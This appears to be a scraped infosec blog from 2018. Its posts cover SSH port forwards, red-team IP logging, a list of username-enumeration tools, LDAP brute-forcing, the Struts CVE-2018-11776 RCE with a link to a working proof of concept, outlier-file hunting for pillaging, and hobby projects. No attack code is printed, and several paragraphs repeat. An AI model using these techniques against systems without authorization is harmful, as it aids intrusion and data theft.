import random def function_A(some_var): return("{} - A".format(some_var)) def function_B(some_var): return("{} - B".format(some_var)) def function_C(some_var): return("{} - C".format(some_var)) #Run a random function with the input of "blahblah" random.choice([function_A, function_B, function_C])("blahblah") #do it as many times as you'd like, and you'll get different results random.choice([function_A, function_B, function_C])("blahblah") random.choice([function_A, function_B, function_C])("blahblah") random.choice([function_A, function_B, function_C])("blahblah") random.choice([function_A, function_B, function_C])("blahblah")
Friday, December 21, 2018
Python - Choose a Function at Random
If you need to randomly select from a number of defined functions, this is a simple way to achieve that:
Labels:
Programming,
Python
Friday, December 14, 2018
SSH Port Forwards In Simpler Terms
I love SSH, I love port forwards, I love all they allow you to do. I hate my memory and all it forgets to do. I decided to write the following so I can easily recall the syntax and meaning for SSH port forwards (-L & -R).
Firstly, both use the same syntax (order of parameters doesn't matter):
ssh root@someVPS -i ~/.ssh/whateverKey -L localhost:2323:localhost:2424
ssh root@someVPS -i ~/.ssh/whateverKey -R localhost:2323:localhost:2424
Even though they are both basically From:To, They have different meanings because -L & -R have different contexts.
-L localhost:2323:localhost:2424 means:
Firstly, both use the same syntax (order of parameters doesn't matter):
ssh root@someVPS -i ~/.ssh/whateverKey -L localhost:2323:localhost:2424
ssh root@someVPS -i ~/.ssh/whateverKey -R localhost:2323:localhost:2424
Even though they are both basically From:To, They have different meanings because -L & -R have different contexts.
-L localhost:2323:localhost:2424 means:
- Create a listening socket on my local laptop (the client) listening at localhost:2323
- Any connection coming into that socket (on my local laptop) send over the SSH connection to the VPS's "localhost:2424" - assuming some app or something is listening on the server on 2424 so this connection is actually useful.
- Can be more easily understood as "-L LocalContextIP:LocalPort:RemoteContextIP:RemotePort"
-R localhost:2323:localhost:2424 means the inverse:
- Create a listening socket on the VPS at localhost:2323
- Any connection into that socket (on the remote VPS) send over the SSH connection to the Laptop's "localhost:2424"
- Can be more easily understood as "-R RemoteContextIP:RemotePort:LocalContextIP:LocalPort"
It's important to note that this isnt restricted to localhost. You can "bounce" connections either way just by changing the "To:" location.
Bounce a connection from my laptop to my VPS and out to google? sure
ssh root@someVPS -i ~/.ssh/whateverKey -L localhost:2323:google.com:80
Bounce a connection from my VPS to my laptop and out to google? sure
ssh root@someVPS -i ~/.ssh/whateverKey -R localhost:2323:google.com:80
-L & -R are really doing nothing more than telling you the direction that the traffic flows. -L is from client -> server and -R is from server -> client.
I use the term "Context" here because that's really what it is. It consults the machine's IPs/Hostnames/whatever that is local to _that_ machine.
This means that if my VPS has an entry in /etc/hosts for "1.1.1.1 yoloswag" and my Laptop has an entry for "2.2.2.2 yoloswag" - they will mean different things depending on where in the command you place "yoloswag"
There, now I won't have to second guess myself everytime I try to create a reverse tunnel through 8 different boxes.
Stupid SSH Trick:
So if you understood what I just wrote then you should say to yourself: "wait, doesnt that mean I can forever have two tunnels passing data back and forth forever" - yes. Yes you can. And it's dumb. Here's how it works:
First anything coming on your laptops localhost:3030 gets sent out to the VPS's localhost:3131
ssh yolohax -L localhost:3030:localhost:3131
Second, anything coming into your VPS's localhost:3131, send out to your Laptops:3030:
ssh yolohax -R localhost:3131:localhost:3030
Go ahead and try it, watch your network usage. Once you issue your first transmission (echo infinitelooplol | ncat localhost 3030) you should get a constant .5-1.5Kbps in both directions. Ctrl-c'ing it won't help because it's stuck in tunnel loop. You have to kill one of the tunnels for it to end.
Stupid SSH Trick:
So if you understood what I just wrote then you should say to yourself: "wait, doesnt that mean I can forever have two tunnels passing data back and forth forever" - yes. Yes you can. And it's dumb. Here's how it works:
First anything coming on your laptops localhost:3030 gets sent out to the VPS's localhost:3131
ssh yolohax -L localhost:3030:localhost:3131
Second, anything coming into your VPS's localhost:3131, send out to your Laptops:3030:
ssh yolohax -R localhost:3131:localhost:3030
Go ahead and try it, watch your network usage. Once you issue your first transmission (echo infinitelooplol | ncat localhost 3030) you should get a constant .5-1.5Kbps in both directions. Ctrl-c'ing it won't help because it's stuck in tunnel loop. You have to kill one of the tunnels for it to end.
Wednesday, November 28, 2018
Keep Track Of Your Source IP
Pentesters/RedTeamers often need to track their outgoing IPs for Blue Teams to be able to correlate activity and know if an attack is shceduled activity or something else.
Below is a script that will reach out, grab your public IP, and if it's different from the last entry, enter it into a log file. I use crontab to execute it at the top of every minute.
Now you can change IPs via VPN or whatever and always be able to refer to it later. The only edge case is if you change IPs multiple times within one minute, but that should be rare and accounted for in sprays.
Below is a script that will reach out, grab your public IP, and if it's different from the last entry, enter it into a log file. I use crontab to execute it at the top of every minute.
#!/bin/bash # This script records changes to your external IP to a log file with timestamp # Install: # crontab -e # * * * * * /Users/MYUSERNAME/WHEREVER/iplog.sh # And then change the iplogfileloc below to where you want the logfile to save. # You should have an iplog.txt with contents like this: # $ cat iplog.txt # Wed Nov 28 12:56:40 MST 2018 -- 177.243.11.21 # Wed Nov 28 13:00:07 MST 2018 -- 17.18.24.6 # Change the below location to what you want iplogfileloc="/Users/MYUSERORWHATEVERHERE/iplog.txt" myip=$(curl httpbin.org/ip 2> /dev/null| grep origin | awk '{print $2}' | tr -d '"') #create file if it doesnt exist [ -f ${iplogfileloc} ] || touch ${iplogfileloc} if ! cat ${iplogfileloc} | tail -1 | grep ${myip} > /dev/null ; then # if your IP has changed, add it to the file echo $(date) '--' ${myip} >> ${iplogfileloc} fi
Now you can change IPs via VPN or whatever and always be able to refer to it later. The only edge case is if you change IPs multiple times within one minute, but that should be rare and accounted for in sprays.
Labels:
Bash,
Network,
Programming,
Redteam
Monday, November 26, 2018
Ways to Enumerate Users
A couple of methods to identify usernames that can then be used in other areas of a pentest are below. I added as many as I could think of. I limited it to ones mostly seen from the public Internet.
- WebApp login error username enumeration (custom per webapp, use python/burp)
- WebApp URL/Cookie differences (customer per webapp, use python/burp)
- Document Metadata from google dork (https://github.com/ElevenPaths/FOCA)
- Public leaks/dumps (mostly just linkedin)
- skype/Lyncsmash (https://github.com/nyxgeek/lyncsmash)
- Exposed SMB/RID Cycling (https://github.com/portcullislabs/enum4linux)
- Kerberos Username Validation (https://nmap.org/nsedoc/scripts/krb5-enum-users.html)
- OWA username enumeration (https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/owa_login.rb)
- WordPress logins (https://github.com/wpscanteam/wpscan)
- Openssh username enumeration (https://www.exploit-db.com/exploits/45233)
- SMTP VRFY Username Enumeration (https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smtp/smtp_enum.rb)
- SMTP EXPN Username Enumeration (https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smtp/smtp_enum.rb)
- SMTP RCPT TO Username Enumeration (http://pentestmonkey.net/tools/user-enumeration/smtp-user-enum)
Labels:
Metasploit,
Network,
Redteam,
Web
Tuesday, September 18, 2018
Saner Bash Commands Inside Python
As great as Python is, sometimes the dev's make really weird decisions regarding defaults. A perfect example is running shell commands inside Python 3+. For some reason the dev thought it was a good idea to make the subprocess "run" method _not_ capture the output from stdout or stderr by default. I find this incredibly annoying and it constantly result in me having to look up the syntax since I always forget it.
I decided to instead have this little helper function to encapsulate what I consider to be saner defaults. I decode the bytes into utf8 since thats the output for 99% of all bash commands.
Running that function will execute whatever command you pass it (insecure, but use it appropriately) and returns an object that you can then check the return code, stdout, and stderr.
So now, it's just:
I decided to instead have this little helper function to encapsulate what I consider to be saner defaults. I decode the bytes into utf8 since thats the output for 99% of all bash commands.
#!/usr/bin/env python3 import subprocess def run_cmd(cmd): result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) result.stdout = result.stdout.decode('utf8') result.stderr = result.stderr.decode('utf8') return result
Running that function will execute whatever command you pass it (insecure, but use it appropriately) and returns an object that you can then check the return code, stdout, and stderr.
So now, it's just:
In [25]: if 'root' in run_cmd('whoami').stdout: ....: print("you are root") ....: you are root
Labels:
Programming,
Python,
Shells
Thursday, August 30, 2018
Download All Corporate Git Repos
Depending on the client you are testing, they may have an internal development team that checks code into a git repo. The vast majority of the clients I've seen implement the Atlassian suite of tools, typically containing an internally hosted Bitbucket.
The Bitbucket web interface has a search feature for looking for code snippets. It's absolutely awful. It's like an off brand tonka toys reject of a search function. You know what's way better? grep. That means I'd have to download every repo to search it locally. I did that with this script:
It's handy to note that grepping isn't the only good thing about cloning repos locally. It allows you to run the myriad of vuln checker tools, load up the code into an IDE and run source/sink analysis on it, and much more.
The Bitbucket web interface has a search feature for looking for code snippets. It's absolutely awful. It's like an off brand tonka toys reject of a search function. You know what's way better? grep. That means I'd have to download every repo to search it locally. I did that with this script:
It's handy to note that grepping isn't the only good thing about cloning repos locally. It allows you to run the myriad of vuln checker tools, load up the code into an IDE and run source/sink analysis on it, and much more.
Labels:
Network,
Programming,
Python
Wednesday, August 29, 2018
Brute Force LDAP Names (or how I kinda downloaded LDAP)
Running queries over a network using the ldapsearch tool can be a bit annoying. It's especially annoying when you constantly run into the "size limit exceeded" result when you get large responses.
I decided to write a little tool to recursively and conditionally search LDAP for CN entries (basically AD account names) and download them locally. If it detects the error size limit error, it automatically adds a new character to drill even further.
It works fantastically well. After you run this tool you should have many .out files containing ldap query responses. Grep to your hearts content:
I decided to write a little tool to recursively and conditionally search LDAP for CN entries (basically AD account names) and download them locally. If it detects the error size limit error, it automatically adds a new character to drill even further.
It works fantastically well. After you run this tool you should have many .out files containing ldap query responses. Grep to your hearts content:
Labels:
Network,
Programming,
Python
Thursday, August 23, 2018
Apache Struts 2 Vulnerability & Exploit (CVE-2018-11776)
Yesterday a new vulnerability in certain versions of Apache Struts (2.3 - 2.3.34, 2.5 - 2.5.16)was discovered that leads to RCE. It requires both vulnerable versions as well as vulnerable configurations.
The gist of the issue is that if you have a vulnerable configuration that doesn't lend a namespace to struts, struts will take the user-specified namespace instead. Fortunately, it takes the namespace and evaluates it as a OGNL expression, allowing you to fairly easily get remote code execution.
Working PoC (I personally tested it myself and it works)
https://github.com/jas502n/St2-057
Technical deep dive on finding the vulnerability:
https://lgtm.com/blog/apache_struts_CVE-2018-11776
Vuln writeup by Semmle (including conditions for vulnerable configurations)
https://semmle.com/news/apache-struts-CVE-2018-11776
Apache's security bulletin for the vuln:
https://cwiki.apache.org/confluence/display/WW/S2-057
Mitre CVE link:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776
A couple caveats I found while testing:
The gist of the issue is that if you have a vulnerable configuration that doesn't lend a namespace to struts, struts will take the user-specified namespace instead. Fortunately, it takes the namespace and evaluates it as a OGNL expression, allowing you to fairly easily get remote code execution.
Working PoC (I personally tested it myself and it works)
https://github.com/jas502n/St2-057
Technical deep dive on finding the vulnerability:
https://lgtm.com/blog/apache_struts_CVE-2018-11776
Vuln writeup by Semmle (including conditions for vulnerable configurations)
https://semmle.com/news/apache-struts-CVE-2018-11776
Apache's security bulletin for the vuln:
https://cwiki.apache.org/confluence/display/WW/S2-057
Mitre CVE link:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776
A couple caveats I found while testing:
- It definitely requires a lack of namespace attribute in the classes xml
- All that is required for successful exploitation is a single proper GET request
- Doesn't work on all struts-showcase installs (2.3.15 wasn't working for some reason), making me think it may be a bit finicky
I modified the PoC listed above into a simple python function, making everything simpler:
Labels:
Exploit Dev,
Web
Wednesday, August 15, 2018
Twitter Controlled Anything - Micropython on ESP32
I recently purchased an ESP32 from amazon for testing purposes and a colleague mentioned you could install a minimalist python environment on them for control. To say the least, I was intrigued.
I wanted to be able to control a light (or anything really) using tweets. Below are the instructions/scripts I wrote to get it working. First comes the prerequisites:
Connect the LED to Pin 2 on the ESP32 and it's all set to go. Now onto the flask server...
On your VPS/Pi/whatever, install flask and tweepy and create a directory to hold your script files. Grab the Access Token, Access Secret, Consumer Secret, Consumer Key from your Twitter Dev console that you set up earlier and place them in a "twitter_creds.py" file like the following:
Then paste the following into "tweepy-top.py"
Now create your main flask app by pasting the following into "flaskhello.py":
There you can see 'light' is used as the trigger word. Using this setup, every 2 seconds the esp32 will make a request to your flask server, which causes the flask server to query twitter for the user's top tweet, if the top tweet contains the word "light" in it, it returns the string "yes". The ESP32 recognizes the "yes" and turns on pin 2.
This is a very simple PoC and gets the job done. You can take this and expand in a thousand directions with it, some ideas:
I wanted to be able to control a light (or anything really) using tweets. Below are the instructions/scripts I wrote to get it working. First comes the prerequisites:
- ESP32 (duh)
- A VPS, Pi, or really any computer acting as a flask server (it just needs internet access)
- A wifi network for the ESP32 to connect to, I just used the hotspot on my phone as a PoC
- Twitter API credentials (really easy to get, just fill out the forms)
TLDR:
Your ESP32 will query your flask server for a trigger word to enable the LED. The Flask server will query twitter for your latest top tweet, if it has a trigger word in it, relay that to the esp32 client. Boom, tweet causes LED to turn on.
The first step is to get your ESP32 setup running the micropython environment. I followed this excellent guide.
Once you get your ESP32 configured to run python code, go ahead and transfer the following script to act as the client. You just need to change the wifi details and target flask server:
import machine import urequests import time pin = machine.Pin(2, machine.Pin.OUT) def connect(): import network sta_if = network.WLAN(network.STA_IF) if not sta_if.isconnected(): print('connecting to network...') sta_if.active(True) sta_if.connect('WIFINETWORKSSIDHERE', 'WIFIPASSWORDHERE') while not sta_if.isconnected(): pass print('network config:', sta_if.ifconfig()) def no_debug(): import esp # this can be run from the REPL as well esp.osdebug(None) no_debug() connect() while True: time.sleep(2) if 'yes' in urequests.get('http://MYFLASKDOMAINHERE.com:5000').text: pin.value(1)
Connect the LED to Pin 2 on the ESP32 and it's all set to go. Now onto the flask server...
On your VPS/Pi/whatever, install flask and tweepy and create a directory to hold your script files. Grab the Access Token, Access Secret, Consumer Secret, Consumer Key from your Twitter Dev console that you set up earlier and place them in a "twitter_creds.py" file like the following:
ACCESS_TOKEN = '18077065-lakjsdflkajshdlfkajshdflkajsdhqqSYOtHSXtK1' ACCESS_SECRET = 'hPqlkwjehrlkfjnlqwejhqrwklejrqhlwkejrJr1' CONSUMER_KEY = 'QZlk9qlkwejrhqlkwjerhlqwlLh' CONSUMER_SECRET = 'uEnkzjxcnvluqblwjbefkqwlekjflkqjwehflqlkjhuOE'
Then paste the following into "tweepy-top.py"
from twitter_creds import * import tweepy auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET) auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET) api = tweepy.API(auth) def get_top_tweet(): top_tweet = api.user_timeline(count=1) return top_tweet[0].text
Now create your main flask app by pasting the following into "flaskhello.py":
from flask import Flask from tweepy_top import get_top_tweet app = Flask(__name__) @app.route("/") def hello(): if 'light' in get_top_tweet(): return 'yes' else: return 'no' if __name__ == "__main__": app.run(host="0.0.0.0", threaded=True)
There you can see 'light' is used as the trigger word. Using this setup, every 2 seconds the esp32 will make a request to your flask server, which causes the flask server to query twitter for the user's top tweet, if the top tweet contains the word "light" in it, it returns the string "yes". The ESP32 recognizes the "yes" and turns on pin 2.
This is a very simple PoC and gets the job done. You can take this and expand in a thousand directions with it, some ideas:
- A desktop counter that keeps track of your followers, retweets, likes, etc
- A LED scroller that outputs your latest mentions
- Or simply use twitter as the control for some device
The options are endless...enjoy :D
Labels:
Hardware,
Just For Fun,
Programming,
Python,
Web,
WiFi
Thursday, August 2, 2018
Top 100 Ingredients From HomeChef Recipes
I love cooking, I consider it my primary hobby outside of infosec/coding. I had HomeChef for several months and absolutely loved it, I looked forward to each selection every week and always got to try some new techniques/flavors/combinations I probably would never had tried on my own.
Every meal they sent us had a double-sided recipe page to guide you through the process. I noticed something at the bottom of the recipe page:
They have a handy link for each recipe posted on their website, probably so it's easy to share what you made with family/friends. The fact that I saw a number, along with a list of ingredients got my thinking...
If I were to stock my pantry/fridge with "basic" ingredients, what would it look like? How about I count up the occurrences of certain ingredients on each recipe page, that should give me a good idea.
Well after gathering the data over a couple of days (I kept everything slow so as to not cause any problems) I present to you, the top 100 ingredients according to recipes on HomeChef.com
Count Ingredient
609 Garlic Cloves
433 Butter
345 Boneless Skinless Chicken Breasts
320 Green Onions
315 Shallot
219 Lemon
210 Sour Cream
208 Lime
202 Red Onion
186 Grape Tomatoes
178 Red Bell Pepper
170 Parsley Sprigs
158 Yellow Onion
154 Mayonnaise
153 Red Pepper Flakes
152 Honey
149 Liquid Egg
148 Cremini Mushrooms
142 Russet Potatoes
142 Green Beans
138 Jasmine Rice
135 Cilantro Sprigs
134 Sugar
131 Chopped Ginger
125 Baby Arugula
122 Grated Parmesan Cheese
119 Carrot
117 Roma Tomato
114 White Cooking Wine
104 Baby Spinach
102 Grated Parmesan
101 Panko Breadcrumbs
100 Light Cream
100 Shredded Mozzarella
99 Slaw Mix
98 Jalapeño Pepper
95 Cilantro
95 Shrimp
94 Thyme Sprigs
93 Zucchini
93 Garlic Clove
89 Parsley
88 Sriracha
87 Dijon Mustard
84 Sirloin Steaks
82 Cornstarch
76 Heavy Whipping Cream
76 Light Brown Sugar
75 Seasoned Rice Vinegar
74 Romaine Heart
73 Pork Tenderloin
72 Kale
72 Shredded Cheddar Cheese
72 Asparagus
71 Sweet Potato
71 Flour
69 Roasted Red Peppers
69 Spinach
69 Ground Beef
68 Salmon Fillets
68 Matchstick Carrots
68 Toasted Sesame Oil
62 Brussels Sprouts
62 Soy Sauce - Gluten-Free
61 Carrots
60 Mini Baguette
57 Small Flour Tortillas
57 Persian Cucumber
57 Basil Pesto
56 Green Onion
56 Ground Turkey
54 Teriyaki Glaze
54 Radishes
54 Red Fresno Chile
53 Beef Demi-Glace
52 Ear of Corn
51 Basil Sprigs
51 Roasted Chicken Breast
50 Roma Tomatoes
50 Blue Cheese
50 Canned Evaporated Whole Milk
49 Marinara Sauce
49 Extra Firm Tofu
48 Smoked Paprika
47 Balsamic Vinegar
47 Naan Flatbreads
47 Bacon Strips
47 Chicken Demi-Glace
46 Taco Seasoning
45 Avocado
45 Broccoli Florets
45 Frozen Peas
44 Chives
44 Corn Kernels
44 Plain Greek Yogurt
44 Tilapia Fillets
43 Navel Orange
43 Feta Cheese
43 Bone-in Pork Chops
What would a post be without some code? below is the embarrassing Python script (hey, it worked...) that parses the HTML:
Every meal they sent us had a double-sided recipe page to guide you through the process. I noticed something at the bottom of the recipe page:
They have a handy link for each recipe posted on their website, probably so it's easy to share what you made with family/friends. The fact that I saw a number, along with a list of ingredients got my thinking...
If I were to stock my pantry/fridge with "basic" ingredients, what would it look like? How about I count up the occurrences of certain ingredients on each recipe page, that should give me a good idea.
Well after gathering the data over a couple of days (I kept everything slow so as to not cause any problems) I present to you, the top 100 ingredients according to recipes on HomeChef.com
Count Ingredient
609 Garlic Cloves
433 Butter
345 Boneless Skinless Chicken Breasts
320 Green Onions
315 Shallot
219 Lemon
210 Sour Cream
208 Lime
202 Red Onion
186 Grape Tomatoes
178 Red Bell Pepper
170 Parsley Sprigs
158 Yellow Onion
154 Mayonnaise
153 Red Pepper Flakes
152 Honey
149 Liquid Egg
148 Cremini Mushrooms
142 Russet Potatoes
142 Green Beans
138 Jasmine Rice
135 Cilantro Sprigs
134 Sugar
131 Chopped Ginger
125 Baby Arugula
122 Grated Parmesan Cheese
119 Carrot
117 Roma Tomato
114 White Cooking Wine
104 Baby Spinach
102 Grated Parmesan
101 Panko Breadcrumbs
100 Light Cream
100 Shredded Mozzarella
99 Slaw Mix
98 Jalapeño Pepper
95 Cilantro
95 Shrimp
94 Thyme Sprigs
93 Zucchini
93 Garlic Clove
89 Parsley
88 Sriracha
87 Dijon Mustard
84 Sirloin Steaks
82 Cornstarch
76 Heavy Whipping Cream
76 Light Brown Sugar
75 Seasoned Rice Vinegar
74 Romaine Heart
73 Pork Tenderloin
72 Kale
72 Shredded Cheddar Cheese
72 Asparagus
71 Sweet Potato
71 Flour
69 Roasted Red Peppers
69 Spinach
69 Ground Beef
68 Salmon Fillets
68 Matchstick Carrots
68 Toasted Sesame Oil
62 Brussels Sprouts
62 Soy Sauce - Gluten-Free
61 Carrots
60 Mini Baguette
57 Small Flour Tortillas
57 Persian Cucumber
57 Basil Pesto
56 Green Onion
56 Ground Turkey
54 Teriyaki Glaze
54 Radishes
54 Red Fresno Chile
53 Beef Demi-Glace
52 Ear of Corn
51 Basil Sprigs
51 Roasted Chicken Breast
50 Roma Tomatoes
50 Blue Cheese
50 Canned Evaporated Whole Milk
49 Marinara Sauce
49 Extra Firm Tofu
48 Smoked Paprika
47 Balsamic Vinegar
47 Naan Flatbreads
47 Bacon Strips
47 Chicken Demi-Glace
46 Taco Seasoning
45 Avocado
45 Broccoli Florets
45 Frozen Peas
44 Chives
44 Corn Kernels
44 Plain Greek Yogurt
44 Tilapia Fillets
43 Navel Orange
43 Feta Cheese
43 Bone-in Pork Chops
What would a post be without some code? below is the embarrassing Python script (hey, it worked...) that parses the HTML:
Labels:
Just For Fun,
Programming,
Python,
Web
XPATH Notes (how to grep xpath)
XPATH is a querying language for XML document trees. Lots of web scrapers use it since HTML can be represented as XML directly.
Your basic "grep" like XPATH query is something like the following:
Your basic "grep" like XPATH query is something like the following:
- //*[@itemprop="recipeIngredient"]
Breakdown:
- // = start at root of tree and include itself in any searches
- * = any tag, anywhere in the document, otherwise replace with tag name
- [blah] = evaluate the condition blah inside the brackets
- @itemprop = This is how you reference attributes instead of tags
- [@itemprop] = the condition is: if the itemprop attribute exists in some tag
- [@itemprop="recipeingredient"] = condition is: if itemprop attribute's value is "recipeingredient"
- //*[@href='example.com']
Or limit it just to direct hyperlinks like "a" tags
- //a[@href='example.com]
XPATH has a lot more functionality than this but this is mostly what I need it for.
PS.
The expression in the condition brackets "[blah]" can be used with certain functions: https://www.w3schools.com/xml/xpath_syntax.asp
Labels:
Programming,
Python,
Ruby,
Web
Wednesday, August 1, 2018
Finding Interesting Files Using Statistical Analysis
I noticed a pattern when scrounging for target data on pentests. Most of the times in which I get valuable data (test creds/log data/unencrypted logs/etc) they are often in files that are in some way different than those around them. Sometimes its their filename, like when you have 400 files named "NightlyLogDATE" and you see a "NightlyLogDATE.bak". It also tends to happen with file sizes. You'll have the same directory and almost every file is around 400-600KB and a couple will be megabytes big or only a couple KB.
These files are "interesting" to me because they differ in some way. These are the outliers. Sometimes they will be temporary backup files where a tech needed to test credit card processing with encryption turned off, or maybe some error pumped traceback/debug output to an otherwise normal file.
I decided to scrounge around online to stitch together a script that will report these outlier files.
The following script will look in the target directory, calculate the median absolute deviation, compare it against a threshold and return the filenames for you to prioritize pillaging.
It's fairly basic so I'm happy to accept any code donations :D
These files are "interesting" to me because they differ in some way. These are the outliers. Sometimes they will be temporary backup files where a tech needed to test credit card processing with encryption turned off, or maybe some error pumped traceback/debug output to an otherwise normal file.
I decided to scrounge around online to stitch together a script that will report these outlier files.
The following script will look in the target directory, calculate the median absolute deviation, compare it against a threshold and return the filenames for you to prioritize pillaging.
It's fairly basic so I'm happy to accept any code donations :D
Labels:
Programming,
Python,
Redteam,
Shells
Friday, July 27, 2018
A Review Of Alex Ionescu's Windows Internals For Reverse Engineers
This year (2018) at Recon in Montreal I signed up to take a class from Alex Ionescu called "Windows Internals for Reverse Engineers", the following are my thoughts on the course and experience.
I decided to take this class after being completely demolished at Infiltrate's "Click Here for Ring Zero" course. That course, despite all its faults, told me I wasn't as strong in Windows Internals as I thought I was. I figured, taking the Windows Internals course from one of the guys that literally writes the book would be a good step. Boy, was I right.
I've taken a lot of training and had lots of bad teachers in the past. Some of those teachers were monotone, non-engaged, unable to map new information to existing concepts, unprepared course material, broken labs, etc. Alex and his course was none of these things. I'm going to break down my evaluation of the teacher and course separately since those are the two main components in all training. I'm going to end with any prerequisites, and final thoughts/recommendations.
Teacher - Alex Ionescu
After going through the training (and talking to several other people in the class) I can confidently say that Alex is at the top (or top 2) of my list in effective communication and teaching. Alex has struck a rare combination of technical mastery over a subject (Windows Internals) as well as the ability to map new information to other people's current understanding.
He exhibited many good teacher practices, below are some of the ones that stood out to me:
The course and its materials were inextricably linked with the teacher so its difficult to speak to it in an independent fashion but here goes nothing.
Make no mistake, this course is not for beginners. It is a full blown firehose of information and topics for 4 days straight. He's pretty relentless and if it wasn't for the fact that he's a fantastic teacher, you'd be easily lost on day one. The course material is extremely technical, in depth, and just a whole lot of it too.
Some things you'll learn about:
For a higher level explanation of the topics you'll cover, Recon's training site was fairly accurate, granted it doesn't give you a sense of the depth. It's deep, yo.
Prerequisites
On the course signup page he mentions the following in "Class Requirements":
Areas of Improvement
I'm really reaching here since honestly if nothing changed about this course, it would still be towards the top of my list. I'd say the only thing I wish could change would be more hands on labs and perhaps some reference material in the back of the handout, things like common WinDBG commands, the C++ notation he uses, and other commonly referenced information. I'd also recommend maybe cutting out some pieces he feels aren't as necessary to distill the content a bit more. But like I said, I'm reaching pretty hard here. If you are ready for the course, take it. I extremely recommend it.
Recommendation
If you feel you are the point in your career where you need a better understanding of Windows Internals to be more effective, and you meet the prerequisites, I strongly recommend this course. While its marketed towards reverse engineers (which I am not) it does help the more senior pentester/red teamer who is looking to branch out into custom Windows malware.
If I could go back in time to my previous self trying to make the decision on whether or not to take this course, I'd tell him to definitely take it. But I'd also tell him to read more of the Windows Internals book before he started class :D
PS.
People pronounce windbg in many ways, "win-dee-bee-jee", "win-debug", etc. He pronounces it "wind-bag" which I find too weird for my tastes. I believe I've discovered the true sentiment and feeling of the tool by pronouncing it my own way: "win-deebag".
I decided to take this class after being completely demolished at Infiltrate's "Click Here for Ring Zero" course. That course, despite all its faults, told me I wasn't as strong in Windows Internals as I thought I was. I figured, taking the Windows Internals course from one of the guys that literally writes the book would be a good step. Boy, was I right.
I've taken a lot of training and had lots of bad teachers in the past. Some of those teachers were monotone, non-engaged, unable to map new information to existing concepts, unprepared course material, broken labs, etc. Alex and his course was none of these things. I'm going to break down my evaluation of the teacher and course separately since those are the two main components in all training. I'm going to end with any prerequisites, and final thoughts/recommendations.
Teacher - Alex Ionescu
After going through the training (and talking to several other people in the class) I can confidently say that Alex is at the top (or top 2) of my list in effective communication and teaching. Alex has struck a rare combination of technical mastery over a subject (Windows Internals) as well as the ability to map new information to other people's current understanding.
He exhibited many good teacher practices, below are some of the ones that stood out to me:
- He would give context for the target material by explaining "neighbor" material that was related. Making it easier to understand technical context and draw logical conclusions.
- He explained the history behind certain design choices in Windows to help eliminate the "Why the hell would they do it that way?" feeling.
- Extremely well prepared with the hand out material.
- Extremely well prepared with presentation material. He had annotation software allowing him to draw data structures and quickly highlight information pertinent to his point. He also had a countdown timer for breaks/lunch so no one ever asked how much time we had left. He always showed up a minute or two before it expired and started on time.
- Was engaging with humor (poked fun at Microsoft devs several times) and not monotone at all.
- Almost never read from the slides, all the information was well understood and presented fluidly.
The course and its materials were inextricably linked with the teacher so its difficult to speak to it in an independent fashion but here goes nothing.
Make no mistake, this course is not for beginners. It is a full blown firehose of information and topics for 4 days straight. He's pretty relentless and if it wasn't for the fact that he's a fantastic teacher, you'd be easily lost on day one. The course material is extremely technical, in depth, and just a whole lot of it too.
Some things you'll learn about:
- Setting up local and remote kernel debug machines
- Windbg syntax, functions, and capabilities
- OS design/decisions for memory and execution models, address space layout, shared data fields (KUSER_SHARED_DATA), functions and capabilities of the hypervisor
- Secure UEFI boot signing, hypervisor based code integrity, PatchGuard, HyperGuard, memory segmentation
- Software guard extensions on new CPUs, kernel/etc interrupts, system calls w/wo hypervisor enabled, win32k.sys
- Windows object manager, the object directory, kernel handle table, sandboxing
That's maybe 10% of the course right there. I just flipped through the handout and wrote down the slide titles and topics I could remember.
For a higher level explanation of the topics you'll cover, Recon's training site was fairly accurate, granted it doesn't give you a sense of the depth. It's deep, yo.
Prerequisites
On the course signup page he mentions the following in "Class Requirements":
I would add a couple more to that list:IMPORTANT: It’s helpful to understand x86/x64/ARM assembly to take this course, but knowledge of obfuscation, packing, etc., is not required.Basic knowledge of Windows, processor architecture, and operating systems is helpful – you should have some vague idea of what an interrupt is, and what is the difference between user and kernel mode (ring levels), a bit about virtual memory/paging, etc.
- Familiarity with C++ notation/syntax (he uses it a lot in windbg)
- An understanding of certain programming concepts such as common data structures, type casting, overloading, modules, macros, memory paging, kinds of linked lists, etc.
I personally recommend you give the latest Windows Internals book a read through before coming to this class. It will help tremendously in not being lost.
I'm really reaching here since honestly if nothing changed about this course, it would still be towards the top of my list. I'd say the only thing I wish could change would be more hands on labs and perhaps some reference material in the back of the handout, things like common WinDBG commands, the C++ notation he uses, and other commonly referenced information. I'd also recommend maybe cutting out some pieces he feels aren't as necessary to distill the content a bit more. But like I said, I'm reaching pretty hard here. If you are ready for the course, take it. I extremely recommend it.
Recommendation
If you feel you are the point in your career where you need a better understanding of Windows Internals to be more effective, and you meet the prerequisites, I strongly recommend this course. While its marketed towards reverse engineers (which I am not) it does help the more senior pentester/red teamer who is looking to branch out into custom Windows malware.
If I could go back in time to my previous self trying to make the decision on whether or not to take this course, I'd tell him to definitely take it. But I'd also tell him to read more of the Windows Internals book before he started class :D
PS.
People pronounce windbg in many ways, "win-dee-bee-jee", "win-debug", etc. He pronounces it "wind-bag" which I find too weird for my tastes. I believe I've discovered the true sentiment and feeling of the tool by pronouncing it my own way: "win-deebag".
Labels:
Personal Development,
Programming,
Training,
Windows
Wednesday, July 25, 2018
Setting Up A Kali Interception VM
Twice now I've had to setup an interception proxy for testing protocol implementations. Below are the steps I took to configure the Kali VM as my main MITM box. I decided to not use a MITM attack like ARP Spoofing but instead setup Kali as a middling router. The networking setup is rather simple:
TargetDevice (over USB Ethernet adapter)-> Kali VM (Bridged Mode) -> Laptop's Wifi
TargetDevice (over USB Ethernet adapter)-> Kali VM (Bridged Mode) -> Laptop's Wifi
- Download/install Kali as a virtual machine
- Set the VM in bridged mode (VMware breaks some things)
- Follow the guide here to get Internet sharing configured on Kali: http://itfanatic.com/?q=node/84
